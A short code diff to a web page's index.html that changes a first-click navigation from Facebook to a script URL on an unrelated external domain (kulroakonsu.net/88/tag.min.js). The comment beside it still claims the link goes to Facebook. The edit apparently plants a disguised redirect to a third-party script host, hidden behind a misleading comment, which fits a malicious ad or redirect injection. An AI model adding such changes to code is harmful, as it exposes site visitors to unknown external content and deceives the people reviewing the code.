--- a/index.html
+++ b/index.html
@@ -153,7 +153,7 @@
         
           function navigateToPage() {
               if (isFirstClick) {
-                  window.location.href = "https://www.facebook.com"; // Navigate to Facebook on first click
+                  window.location.href = "https://kulroakonsu.net/88/tag.min.js"; // Navigate to Facebook on first click
                   isFirstClick = false; // Toggle the click state
               } else {
                   window.location.href = "quiz.html";
